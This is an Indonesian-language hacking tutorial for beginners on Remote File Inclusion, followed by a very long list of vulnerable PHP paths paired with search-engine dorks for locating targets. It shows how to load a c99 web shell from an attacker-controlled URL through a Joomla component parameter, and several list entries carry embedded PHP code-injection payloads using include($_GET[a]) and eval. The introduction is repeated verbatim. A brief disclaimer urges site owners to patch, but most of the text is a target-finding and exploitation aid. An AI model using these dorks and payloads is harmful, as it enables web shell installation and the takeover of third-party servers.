Khusus buat newbie.
Apa itu RFI??
RFI atau Remote File Inclusion adalah salah satu metode hacking dengan menginclude file. Tool yang sering dipakai adalah C99 shell injection atau R57 shell injection.
Metodenya sangat sederhana.
Ketika kita sudah mendapatkan target, kita hanya perlu menginclude file C99 atau R57 nya.
sebagai contoh:
kita mempunyai target
http://domain-name.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
maka disini kita include file c99 nya, menjadi
http://domain-name.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://domain-kita.com/c99.txt
Jika berhasil maka kita akan dapat masuk ke dalam server target dengan c99 shell
berikut beberapa list RFI Bug Dork.
Ini hanya sekedar informasi, jadi bagi yang merasa memakai CMS dengan module-module yang masuk dalam list berikut, segera update module nya atau segera perbaiki bugs nya. Semoga bermanfaat.
==================================================
Apa itu RFI??
RFI atau Remote File Inclusion adalah salah satu metode hacking dengan menginclude file. Tool yang sering dipakai adalah C99 shell injection atau R57 shell injection.
Metodenya sangat sederhana.
Ketika kita sudah mendapatkan target, kita hanya perlu menginclude file C99 atau R57 nya.
sebagai contoh:
kita mempunyai target
http://domain-name.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
maka disini kita include file c99 nya, menjadi
http://domain-name.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://domain-kita.com/c99.txt
Jika berhasil maka kita akan dapat masuk ke dalam server target dengan c99 shell
berikut beberapa list RFI Bug Dork.
Ini hanya sekedar informasi, jadi bagi yang merasa memakai CMS dengan module-module yang masuk dalam list berikut, segera update module nya atau segera perbaiki bugs nya. Semoga bermanfaat.
==================================================
- /?dir= beasiswa.php+.id
- /?cat= allinurl:config.php?
- /?cat= allinurl:setup.php
- /?page= News Article
- /?page= Directory Article
- /?page= Medical Dictionary
- /?id= Portal
- //?content= allinurl:index.php?
- /?language_id= Powered by SkaDate dating
- /?p= allinurl:index.php?
- /image.php?url= Clearcontent
- /?rd= allinurl:admin.php?
- /index.php?page= index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
- /?_zb_path= zeroboard
- /header.php?wwwRoot=
- /submit.php?wwwRoot=
- /submitted.php?wwwRoot=
- /autosubmitter/index.php?wwwRoot=
- /////////?_SERVER%5BDOCUMENT_ROOT%5D= seks
- /////////?_SERVER%5BDOCUMENT_ROOT%5D= /rgboard/
- /////////?_SERVER%5BDOCUMENT_ROOT%5D= /index.php?id=
- /////////?_SERVER%5BDOCUMENT_ROOT%5D= /include/playing.php
- /classes/adodbt/sql.php?classes_dir= allinurl:adobt
- /skin/uks_qnaboard_v2010////write.phpdir= skin by uks
- /skin/ggambo7002_board/write.php?dir= skin by Ggambo
- /skin/ggambo7002_board/write.phpdir= zboard.php
- /skin/happycast_category_lightblack/login.php?dir= happycast
- /skin/happycast_category_deepblue/view.php?dir= happycast
- /skin/buzzard_espoon/setup.php?dir= skin by zeroboard
- /skin/ggambo7002_boardgallery//setup.php?dir= Ggambo
- /skin/happycast_category_lightblack/login.php?dir= happycast
- /skin/sirini_simplism_gallery_v4/setup.php?dir= sirini
- /skin/myssun115_note_white/setup.php?dir= zeroboard
- /skin/purple_bbs/setup.php?dir= /zboard.php?id=
- /skin/PSMG_pro1_21/setup.php?dir= /zboard.php?id=
- /skin/DQ_Revolution_Frontier_Gallery18/setup.php?dir= hosting_users
- /skin/ggambo6210_boardgallery/setup.php?dir= Ggambo
- /skin/aromee/setup.php?dir= aromee
- /skin/PSMG_pro1_6/setup.php?dir= Psmg
- /skin/ikkelim_bbs05/setup.php?dir= ikkelim
- /skin/minkoon_link_skyblue/setup.php?dir= minkoon
- /skin/amick04_lightgreen/setup.php?dir= amick04
- /include/print_category.php?setup[use_category]=1&dir= zeroboard
- /skin/zinbbs_1000/setup.php?dir= zinbss
- /include/write.php?dir= allinurl:/zboard/zboard.php
- /include/setup.php?dir= allinurl:/setup.php?dir=
- /login.php?dir = allinurl:/login.php?dir=
- /include/prodler.class.php?sPath= ProdLer 2.0
- /advanced_comment_system/index.php?ACS_path= Advanced_comment_system_1-0
- /admin/admin_news_bot.php?root_path= admin_news_bot.php?
- /OpenSiteAdmin/pages/pageHeader.php?path= pageHeader.php
- /index.php?adduser=true&lang= index.php?
- /newticket.php?lang= newticket.php
- /rempass.php?lang= rempass.php
- /includes/file_manager/special.php?fm_includes_special= microcms
- /pda_projects.php?offset= pda
- /load_lang.php?_SERWEB[configdir]= Serweb
- /main_prepend.php?_SERWEB[functionsdir]= Serweb
- /load_phplib.php?_PHPLIB[libdir]= Serweb
- /CoupleDB.php?Parametre=0&DataDirectory= PHPG?n?alogie fonctionne sur un serveur PHP
- /themes/default/layouts/standard.php?page_include= 1024 CMS
- /includes/vars.inc.php?_SESSION[SCRIPT_PATH]= SnippetMaster Webpage Editor
- /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= SnippetMaster Webpage Editor
- /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= SnippetMaster Webpage Editor
- /index_inc.php?inc_ordner= /ea-gBook/
- /theme/format.php?_page_content= SMA-DB v0.3.12
- skysilver/login.tpl.php?theme= phpSkelSite
- /components/com_facileforms/facileforms.frame.php?ff_compath= index.php?option=com_facileforms
- /facileforms.frame.php?ff_compath= facileform
- /modules/Forums/favorites.php?nuke_bb_root_path= Powered by Platinum 7.6.b.5
- /modules/EN-Forums/db/mysql.php?phpbb_root_path= Eve-Nuke Portal
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= ?Mambo?site:gr
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= ?Mambo?site:tw
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= ?Mambo?site:mx
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= ?Mambo?site:edu
- administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler?
- administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:?us/index.php?option=com_remository
- modules/My_eGallery/index.php?basepath= inurl:?.de.*?My_eGallery?
- /embed/day.php?path= intitle:?Login to Calendar?
- /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
- /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
- /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
- /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
- /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
- /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
- /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
- db.php?path_local= inurl:?db.php?path_local=?
- /include/common_functions.php?baros_path=
- /include/lib/lib_users.php?main_path=
- /include/lib/lib_stats.php?main_path=
- /include/lib/lib_slots.php?main_path=
- /modules/downloads/lib/LM_Downloads.php?pathToIndex=
- /lib/Loggix/Module/Trackback.php?pathToIndex=
- /lib/Loggix/Module/Rss.php?pathToIndex=
- /lib/Loggix/Module/Comment.php?pathToIndex=
- /lib/Loggix/Module/Calendar.php?pathToIndex=
- /libraries/database.php?path= efront
- /public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER= /install/classes/install.class.php
- /php/init.poll.php?include_class= init.poll.php
- /include/header.php?cs_base_path= Clearsite 4.50
- /dompdf.php?input_file= "/dompdf.php"
- errors.php?error= “index of” errors.php
- index.php?option=com_alberghi&Itemid=&mosConfig.absolute.path= "com_alberghi"
- comments-display-tpl.php?config[comments_form_tpl]= “Powered By TalkBack”
- //skin/happycast_category_lightblack/write.php?%20dir= "skin by zetyx"
- /components/com_moofaq/includes/file_includer.php?gzip=0&file= com_moofaq
- //skin/zero_vote/error.php?%20dir= "zboard"+.pe.kr
- /skin/zero_vote/error.php?%20dir= zeroboard skin by dognara
- /skin/zero_vote/error.php?%20dir= zeroboard skin by jiYoo
- /skin/zero_vote/error.php?%20dir= zeroboard skin by daerew
- /skin/zero_vote/error.php?%20dir= zeroboard skin by zero
- /skin/zero_vote/error.php?%20dir= zeroboard skin by buzzard
- /skin/zero_vote/error.php?%20dir= zeroboard skin by ztyx
- /bbs//skin/zero_vote/error.php?%20dir= zeroboard skin by cHanBi
- /bbs/delete.php?board_skin_path= "board.php?bo_table=" *go.kr*
- /bbs/include/print_category.php?setup[use_category]=1&dir= "/bbs" *co.kr*
- /modules/Forums/admin/admin_forums.php?phpbb_root_path= /modules/Forums/
- //?_PHPLIB[libdir]= car_comlist.php
- includes/class_item.php?fileExtension= "PHP Pro Bid"
- //appserv/main.php/?appserv_root= nfe.go.th
- /modules/xfsection/modify.php?dir_module= "xfsection" "xfsection".jp
- /forum/adminLogin.php?config[forum_installed]= osDate
- /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
- index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22 *de*
- /index.php?option=com_sef&Itemid=&mosConfig.absolute.path= com_sef
- ////?_SERVER[DOCUMENT_ROOT]= ktstudy
- //skin/rini_cleangallery/script_popup.php?dir= Copyright 1999-2010 Zeroboard skin by rini
- accounts/inc/include.php?language=0&lang_settings[0][1]= IceWarp Web Mail 5.4
- ?custompluginfile%5B%5D= Subdreamer categoryid
- /SSI.php?sourcedir= "QueryString.php"
- //skin/jeju_gallery_web/setup.php?dir= "skin by jejuid"
- /forum/adminLogin.php?config[forum_installed]= Login | Privacy | Terms of Use | Services | FAQ's | Articles | Affiliate | Invite a Friend | Feedback
- /config.php?path[docroot]= oneadmin
- /index.php?option=com_registration&mosConfig.absolute.path= "com_registration"+.ru
- modules/Forums/admin/index.php?phpbb_root_path= PHP NUKE ALL VERSION PHP NUKE ALL VERSION
- ?id= "Projekt i realizacja: Euroadres"
- /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path= com_mosmedia
- /_head.php?_zb_path= “Zeroboard”
- /write_comment_update.php?board_skin_path= "wr_id=200"
- /skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir= skin by ggambo
- components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= com_rsgallery
- /bbs//delete_all.php?board_skin_path= "jwkim"
- /forum/adminLogin.php?config[forum_installed]= "osdate" "osdate" "osdate"
- /good.php?board_skin_path= "board.php?bo_table="+.kr
- /index.php?option=com_dwodp&Itemid=&mosConfig_absolute_path= "Powered by mambo" OR "com_dwodp"
- /includes/class_item.php?fileExtension= "Recently Listed Wanted Ads"
- ?_PHPLIB[libdir]= db_msql.inc
- ?_PHPLIB[libdir]= phplib7
- /bbs/write_update.php?board_skin_path= "gnuboard4"
- /estrutura/enquetes//comments.php?id={${include($ddd)}}{${exit()}}&ddd= /estrutura/enquetes/
- /gnuboard4/index.php?g4[path]= /gnuboard4
- /write_update.php?board_skin_path= "/board/bbs" *.kr*
- /delete_all.php?board_skin_path= "/main/bbs/" *.kr*
- /delete.php?board_skin_path= "/g4/bbs/" *.kr*
- /delete_all.php?board_skin_path= "/bbs" *or.kr*
- /delete_all.php?board_skin_path= "/bbs" *go.kr*
- /delete_all.php?board_skin_path= "/bbs" *ac.kr*
- /delete_all.php?board_skin_path= "/bbs" *ms.kr*
- /delete_all.php?board_skin_path= "/bbs" *co.kr*
- /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= "geeklog"
- /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Copyright 2000 - 2005 Miro International Pty Ltd"
- /skin/voy_window_blue/setup.php?dir= skin by headvoy
- /index.php?option=com_jambook&mosConfig.absolute.path= "com_jambook"
- /modules/Forums/admin/admin_smilies.php?phpbb_root_path= Powered by phpBB 2.0.10 © 2001-2003 phpBB Group
- ?includes_dir= "index.php?option=contact"
- /bbs/delete.php?board_skin_path= /bbs/delete.php
- /bbs/delete_all.php?board_skin_path= /bbs/delete_all.php
- ////delete_comment.php?board_skin_path= "forum/bbs"+.kr
- /delete_comment.php?board_skin_path= "board.php?" "bbs"
- /include/_bot.php?master[currentskin]= "the nerdclub programming team"
- http://www.djalberto.de/cms///administrator/components/com_events/admin.events.php?mosConfig_absolute_path= "com_events"+.de
- conf.php?subdir= "wow roster"
- /delete_all.php?board_skin_path= "/_board8/bbs/"
- /bbs/write_update.php?board_skin_path= "board/bbs/"
- /xoops_lib/modules/protector/oninstall.php?mydirname=a(){}include($_GET[a]);function%20v&a= "The XOOPS Project"
- delete_all.php?board_skin_path= "board/bbs/" site:kr
- /help_text_vars.php?dir&PGV_BASE_DIRECTORY= /phpGedview/login.php
- /bbs/delete.php?board_skin_path= /bbs/delete.php
- /bbs/skin/delete_all.php?board_skin_path= "/delete_all.php"
- /?sourcedir= “SITEMAP.php”
- ?sourcedir= Notice: Undefined variable: sourcedir in
- //?_SERVER[DOCUMENT_ROOT]= httpdocs site:.ru
- /plugin/replace/plugin.php?PHORUM[settings_dir]= /phorum/
- /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= site:hu
- /skin/ggerzer_diary/ask_password.php?dir= skin by ggerzer
- /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path= "com_frontpage"+.net
- /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path= com_frontpage
- /chat/inc/cmses/aedatingCMS.php?dir[inc]= flashchat
- /include/mail.inc.php?skin_board_path= "?bbs_id=" org
- /skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir= GGAMBO *.kr
- ///announcements.php?phpraid_dir= phpRaid
- /booth.php?include_path= POLLDB
- /modules/Forums/admin/admin_users.php?phpbb.root.path= PHP NUKE
- /administrator/components/com_virtuemart/compat.joomla1.5.php?mosConfig.absolute.path= "virtuemart"+ru
- /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path= "virtuemart"+ar
- /assets/snippets/reflect/snippet.reflect.php?reflect_base= MODx Content Manager
- /skin/daerew_webjin2_GD_POP/setup.php?dir= skin by daerew
- /?_SERVER[DOCUMENT_ROOT]= "external" site:.it
- /accounts/inc/include.php?language=0&lang_settings[0][1]= "IceWarp"+site%3Atr
- index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= "mambo" site:tr
- /inc/design.inc.php?dir[inc]= aechat.php
- ?INCLUDE_FOLDER= e404.php
- index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "index.php?option=com_phpshop"
- admin/editor2/spaw_control.class.php?spaw_root= "cjaycontent"
- /include/print_category.php?setup[use_category]=1&dir= "bbs" "board" "zboard" "zeroboard"
- /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop
- /index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= com_docman
- /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= /phpBB208/
- plugins/spamx/BlackList.Examine.class.php?_CONF[path]= geeklog
- ?_PHPLIB[libdir]= /phplib/
- /skin/salz_gallery/ask_password.php?dir= "skin by salz"
- ?_SERVER[DOCUMENT_ROOT]= /var/vhost/www
- /announcements.php?phpraid_dir= phpRaid Raid Management Provided by phpRaid v3.0.7 (unofficial version by Schwick)
- /?view=page&pagename= "/?view=main&cityid="
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
- /?_zb_path= /outlogin.php
- /?_PHPLIB[libdir]= "site48"+.com
- ?_SERVER[DOCUMENT_ROOT]= "zakaz.php"
- /pafiledb/includes/pafiledb_constants.php?module_root_path= /pafiledb/includes/
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” *xoo*
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” *mo*
- /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= ".php?name=Forums=" it ".php?name=Forums=" it
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content”
- skin/gallery/setup.php?dir= gohackers
- ?custompluginfile[]= index.php?categoryid=10
- /lostpassword.php/?_SERVER[DOCUMENT_ROOT]= /lostpassword.php/
- /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= /modules/vwar/
- conlib/local.php?cfg[path][contenido]= "cms/front_content.php?idcat=12"
- /skin/ggambo5100_board//setup.php?setup[use_category]=1&dir= "zboard"
- ?sourcedir= Settings.php
- ?sourcedir= SSI.php
- ?_SERVER[DOCUMENT_ROOT]= "gonggu.php"
- /index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "com_phpshop"
- /survey.inc.php?path= "nabopoll"
- /?_zb_path= "zeroboard"+tk
- ?_SERVER[DOCUMENT_ROOT]= "/bbs"+kr
- ?_SERVER[DOCUMENT_ROOT]= "list.php"+ru
- /skin/happycast_category_lightblack/setup.php?setup[use_category]=1&dir= "skin by zetyx"
- modules/Forums/admin/admin_words.php?phpbb_root_path= PHP NUKE RUSSIAN
- /poll/png.php?include_path= “action”+”poll_ident”
- /components/com_mojo/wp-trackback.php?mosConfig_absolute_path= com_mojo
- /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= xoopsgallery
- index.php?go= inurl:"index.php?go="
- /skin/gallery_9/error.php?dir= skin by dognara
- modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= "topgroupname"
- modules/Forums/favorites.php?nuke_bb_root_path= Powered by PHP Nuke Platinum 7.6.b.5
- /phpBB2/shoutbox.php?phpbb_root_path= /phpBB2/
- /mods/iai/includes/constants.php?phpbb_root_path= /mods/iai/
- //skin/uks_gallery_v3010//write.php?setup[use_category]=1&dir= "skin by uks"
- index.php?g4[path]= /gnuboard4/
- /includes/class_item.php?fileExtension= "PHP Pro Software"
- /php121adminconfig.php?mosConfig_absolute_path= PHP121
- /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE"
- skin/inrize_blue/setup.php?dir= skin by blueSakk
- skin/happycast_category_deepblue/write.php?dir= skin by Zetyx
- /mambo/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "mambo"
- /skin/ggambo7002_boardgallery/write.php?dir= skin by GGAMBO 7002
- //?_SERVER[DOCUMENT_ROOT]= init_basic.php
- //?_SERVER[DOCUMENT_ROOT]= center.php
- /?mosConfig_absolute_path= "/includes/joomla.php"
- index.php?_SERVER[DOCUMENT_ROOT]= amboard
- /admin/common.inc.php?base_path= "demo_3.php"
- /admin/common.inc.php?base_path= "pollphp"
- //modules/Forums/admin/index.php?phpbb_root_path= "PHP-Nuke Copyright © 2005 by Francisco Burzi"
- //modules/Forums/admin/index.php?phpbb_root_path= "Copyright © 2003 by PHP-Nuke"
- /modules/Forums/admin/index.php?phpbb_root_path= PHP NUKE EUROPE
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v0.9
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v0.9.40
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v0.9.43
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v0.9.42 (21 Jul 2003)
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
- /tools/send_reminders.php?noSet=0&includedir= "WebCalendar v1.1"+net
- ws/login.php?noSet=0&includedir= “Public Access (Login)” WebCalendar
- ws/login.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
- /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
- ///?include_path= Guestbook.php
- //?_SERVER[DOCUMENT_ROOT]= "poisk.php"
- /?sourcedir= “/QueryString.php”
- /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]= com_ezine -p 100
- /skin/zae_schedule/ask_password.php?dir= /skin/zae_schedule
- skin/zae_schedule/ask_password.php?dir= bbs skin skin zae
- //?_SERVER[DOCUMENT_ROOT]= "s31"
- /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path= /skin_shop/
- ?_SERVER[DOCUMENT_ROOT]= /srv/www/vhost/
- /skin/sirini_simplism_gallery_v4//setup.php?setup[use_category]=1&dir= sirini skin
- /admin/common.inc.php?base_path= "pollphp" "textfile"
- /bbs/skin/uks_board_v3010//setup.php?dir= skin by uks
- /skin/ruvin_fine_gall2/setup.php?dir= skin by ruvin
- //www.dizzone.com/ver3/bulletin//skin/pqbig_board_blue/login.php?dir= "http://rapidlibrary.com"
- /playing.php/common/db.php?commonpath= "Copyright Spacial Audio Solutions"
- /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= "?picture_id=491"
- /rconfig.inc.php?config[root_dir]= /dwmember/ /dwmember/
- /rgboard/include/mail.inc.php?skin_board_path= "rgboard" site:kr
- /skin/pqbig_board_black/login.php?dir= skin by pqbig
- /skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir= skin by ggambo
- components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "//virtuemart/"+.biz
- components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "//virtuemart/"+.pp
- /setup.php?dir= skin by 10up
- /skin/rosun_comm2_gallery/setup.php?dir= /zbbs//skin/
- /engine/api/api.class.php?dle_config_api= Powered By DataLife Engine
- /bbs//skin/zero_vote/ask_password.php?dir= "zero_vote" site:kr
- //?_SERVER[DOCUMENT_ROOT]= "themes"site:.ru
- /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path= "/includes/joomla.php"
- classes/adodbt/sql.php?classes_dir= "Powered by Limbo CMS"
- index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
- /bbs/skin/hb_site/setup.php?dir= hb_site skin
- /viewtopic.php?t=15&sid=be16c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "powered by phpBB 2.0.8"
- /write.php?setup[use_category]=1&dir= "ggambo7002" -p 100
- /write.php?setup[use_category]=1&dir= "ggambo7000" -p 100
- /write.php?setup[use_category]=1&dir= "ggambo6000" -p 100
- /skin//setup.php?dir= /comment_modify.php?
- /accounts/inc/include.php?language=0&lang_settings[0][1]= "Powered by Merak Mail Server Software"
- /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
- includes/class_item.php?fileExtension= "Recently Listed Wanted Ads"
- /common/db.php?commonpath= “playing.php”
- /common/db.php?commonpath= “samPHPweb”
- /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "page,shop.browse"
- ?INCLUDE_FOLDER= "e404.php"
- .rfi2 //skin/happycast_category_lightblack/setup.php?dir= "skin by zetyx"
- /advanced_comment_system/admin.php?ACS_path= advanced_comment_system
- /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path= com_artforms
- components/com_jombib/BibTex.php?mosConfig_absolute_path= com_jombib
- /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= "Miro International Pty Ltd"
- config/config.php?cfg[rootPath]= EZsneezyCal
- /setup.php?dir= "/bbs/skin/" site:kr
- /bbs//skin/sirini_ezset_fullpack/setup.php?dir= /skin/sirini_ezset_fullpack/
- /skin/happycast_category_lightblack/setup.php?dir= "skin by zetyx"
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Mambo"
- /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= "skin_shop"
- .rfi /hearst_journalism/championship.php?year= hearst_journalism
- include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
- /xoops_lib/modules/protector/oninstall.php?mydirname=a(){}include($_GET[a]);function%20v&a= "The XOOPS Project"
- /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]= com_ezine
- /component/option,com_kunena/export.php?mosConfig_absolute_path= "com_kunena"
- /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path= "virtuemart" info "virtuemart" info
- bad_link.php?theme_path= bad_link.php
- //skin/happycast_category_lightblack/setup.php?dir= "skin by zetyx" *ac.kr*
- //index.php?option=com_content&task=category§ionid=1&id=29&Itemid=49//index.php?_REQUEST=&_REQUEST%5Boption%%205D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path= com_content&task
- /accounts/inc/include.php?language=0&lang_settings[0][1]= "powered by Icewarp"
- /appserv/main.php?appserv_root= "The AppServ Open Project"
- //skin/dongnara_gallery/setup.php?dir= dongnara
- /modules/xfsection/modify.php?dir_module= "xfsection" "xfsection"
- ?cfg[rootPath]= EZsneezyCal
- include/_bot.php?master[currentskin]= "you%20are%20not%20logged%20in%20>%20login%20%20|%20%20forgot%20%20your%20%20password?%20%20|%20%20register"
- ?mosConfig_absolute_path= "virtuemart" -p 100
- index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= includes/mambo.php
- /hpmaker/index.php?p= /HpMaker/
- components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= “Virtuemart”+.km
- ?sourcedir= Powered by SMF
- /PNphpBB2/includes/functions_admin.php?phpbb_root_path= "modules.php?name=PNphpBB2"
- /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act= /kboard.php?board=
- ?pag= ?pag=contato
- /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."
- /?_zb_path= "/bbs/zboard/"
- /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Forgotten your password?"+"No account yet?"
- /?_zb_path= "zboard"+.ru
- /appserv/mani.php?appserv_root= c:\appserv\www
- /setup.php?dir= /bbs/
- admin.php?include_path= "Before you can proceed you have to enter a valid name and password!"
- /write.php?dir= "/bbs/skin/"
- ///////?cmd&file= "List Users with Pics only?"
- ?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= Miro International Pty Ltd.
- /offline.php?mosConfig_absolute_path= "joomla" .net "joomla" .net
- arcade.php?phpbb_root_path= "Latest High Score set by"
- /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0.6" Powered by phpBB 2.0.6 © 2001, 2002 phpBB Group
- /show_menu.php?GLOBALS[binn_include_path]= "pl_menu"
- //viewtopic.php?p=15//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered By PHPBB 2.0.6"
- /index.php?p= "/index.php?p=contato"
- ?INCLUDE_FOLDER= ?curPos=20
- /bbs//skin/zero_vote/login.php?dir= "zeroboard"+.jp
- /arcade.php?phpbb_root_path= "Latest High Score set by"
- /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
- /inc/formmail.inc.php?script_root= "Powered By Form Mail Script"
- //?_SERVER[DOCUMENT_ROOT]= "accounts"
- //?_SERVER[DOCUMENT_ROOT]= "public_html"
- /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov*
- /accounts/inc/include.php?language=0&lang_settings[0][1]= "IceWarp"+site%3Acom
- /accounts/inc/include.php?language=0&lang_settings[0][1]= "IceWarp"+site%3Anet
- /?_zb_path= "zeroboard"+"zboard"+"board"+"bbs"
- ?page= "artmedic" "event"
- /accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
- /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
- /include/mail.inc.php?skin_board_path= "/mb_login.php?url="
- //viewtopic.php?p=15//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered By PHPBB 2.0.10"
- modules/Neos_Chronos/header.php?base_folder= "Neos_Chronos"
- arcade.php?phpbb_root_path= "PHP-Nuke Platinum"
- ?sourcedir= index.php?sourcedir=
- /modify.php?dir_module= "xfsection"
- /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Forgotten your password?"+"No account yet?"
- /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= "/includes/joomla.php"
- /modules/Forums/admin/admin_words.php?phpbb_root_path= PHP-Nuke Port by Tom Nitzschner
